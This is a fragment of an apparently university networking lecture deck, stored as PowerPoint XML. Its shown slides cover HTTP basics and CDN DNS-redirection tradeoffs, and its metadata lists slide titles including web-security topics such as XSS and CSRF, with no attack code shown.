            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assumes that client and Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nameserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are close. Is this accurate?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content owner must give up control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A third-party now serves all your content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What about HTTPS? Must share secret key with third-party</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3166277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Hypertext Transfer Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client/server protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intended for downloading HTML documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be generalized to download any kind of file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP message format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text based protocol, almost always over TCP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Stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requests and responses must have a header, body is optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Headers includes key: value pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Body typically contains a file (GET) or user data (POST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0.9 and 1.0 are outdated, 1.1 is most common, 2.0 has been ratified, may be DOA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1606606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Request Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="HTTPrequest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718397" y="1604865"/>
            <a:ext cx="9432382" cy="47440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767177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lnDef>
      <a:spPr>
        <a:ln w="571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68421</TotalTime>
  <Words>5375</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>836</Paragraphs>
  <Slides>79</Slides>
  <Notes>5</Notes>
  <HiddenSlides>8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91" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Source Code Pro</vt:lpstr>
      <vt:lpstr>Source Code Pro Semibold</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Median</vt:lpstr>
      <vt:lpstr>CS 3700 Networks and Distributed Systems</vt:lpstr>
      <vt:lpstr>Client-Server Computing</vt:lpstr>
      <vt:lpstr>The Web</vt:lpstr>
      <vt:lpstr>Hypertext Transfer Protocol (HTTP)</vt:lpstr>
      <vt:lpstr>Origins</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Architecture circa-1992</vt:lpstr>
      <vt:lpstr>HTTP Protocol</vt:lpstr>
      <vt:lpstr>HTTP Request Format</vt:lpstr>
      <vt:lpstr>HTTP Request Example</vt:lpstr>
      <vt:lpstr>HTTP Request Methods</vt:lpstr>
      <vt:lpstr>HTTP Response Example</vt:lpstr>
      <vt:lpstr>HTTP Response Status Codes</vt:lpstr>
      <vt:lpstr>Sending Data Over HTTP</vt:lpstr>
      <vt:lpstr>Web Pages</vt:lpstr>
      <vt:lpstr>HTTP 0.9/1.0</vt:lpstr>
      <vt:lpstr>HTTP 1.1</vt:lpstr>
      <vt:lpstr>HTTP Caching</vt:lpstr>
      <vt:lpstr>Example Cache Check</vt:lpstr>
      <vt:lpstr>Content on Today’s Internet</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Web Architecture circa-1992</vt:lpstr>
      <vt:lpstr>Web Architecture circa-2016</vt:lpstr>
      <vt:lpstr>Securing the Browser</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie Example</vt:lpstr>
      <vt:lpstr>Managing State</vt:lpstr>
      <vt:lpstr>What About JavaScript?</vt:lpstr>
      <vt:lpstr>Mixing Origins</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Ex: SOP for http://www.example.com/dir/test.html</vt:lpstr>
      <vt:lpstr>XMLHttpRequest (XHR)</vt:lpstr>
      <vt:lpstr>XHR Example</vt:lpstr>
      <vt:lpstr>XHR vs. SOP</vt:lpstr>
      <vt:lpstr>Attacking Web Clients </vt:lpstr>
      <vt:lpstr>Focus on the Client</vt:lpstr>
      <vt:lpstr>Web Threat Model</vt:lpstr>
      <vt:lpstr>Threat Model Assumptions</vt:lpstr>
      <vt:lpstr>Browser Exploits</vt:lpstr>
      <vt:lpstr>Drive-by Install Example</vt:lpstr>
      <vt:lpstr>Exploit Kits</vt:lpstr>
      <vt:lpstr>Threat Model Assumptions</vt:lpstr>
      <vt:lpstr>Cookie Exfiltration</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Types of XSS</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 1</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 1</vt:lpstr>
      <vt:lpstr>Reflected XSS Attack</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 2</vt:lpstr>
      <vt:lpstr>Vulnerable Website, Type 2</vt:lpstr>
      <vt:lpstr>Stored XSS Attack</vt:lpstr>
      <vt:lpstr>Mitigating XSS Attacks</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Vulnerable Website</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CSRF Attack</vt:lpstr>
      <vt:lpstr>Mitigating CSRF Attacks</vt:lpstr>
      <vt:lpstr>HTTP “Referer” Header</vt:lpstr>
      <vt:lpstr>Referer Privacy</vt:lpstr>
      <vt:lpstr>CSRF Tokens</vt:lpstr>
      <vt:lpstr>CSRF Wrapup</vt:lpstr>
      <vt:lpstr>Scaling Up Web Content</vt:lpstr>
      <vt:lpstr>Evolution of Serving Web Content</vt:lpstr>
      <vt:lpstr>Replicated Web Servers</vt:lpstr>
      <vt:lpstr>Load Balancers</vt:lpstr>
      <vt:lpstr>Load Balancing: Are We Done?</vt:lpstr>
      <vt:lpstr>Server Placement</vt:lpstr>
      <vt:lpstr>Why Speed Matters</vt:lpstr>
      <vt:lpstr>CDNs</vt:lpstr>
      <vt:lpstr>Key Components of a CDN</vt:lpstr>
      <vt:lpstr>Examples of CDNs (c. 2019)</vt:lpstr>
      <vt:lpstr>Examples of CDNs</vt:lpstr>
      <vt:lpstr>Inside a CDN</vt:lpstr>
      <vt:lpstr>Mapping Clients to Servers</vt:lpstr>
      <vt:lpstr>Content Delivery Networks</vt:lpstr>
      <vt:lpstr>CDN Redirection Example</vt:lpstr>
      <vt:lpstr>DNS Redirection Considerations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Wilson, Christo</cp:lastModifiedBy>
  <cp:revision>934</cp:revision>
  <cp:lastPrinted>2012-08-22T04:00:45Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-01-03T02:22:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-09T16:36:42Z</dcterms:modified>
</cp:coreProperties>
</file>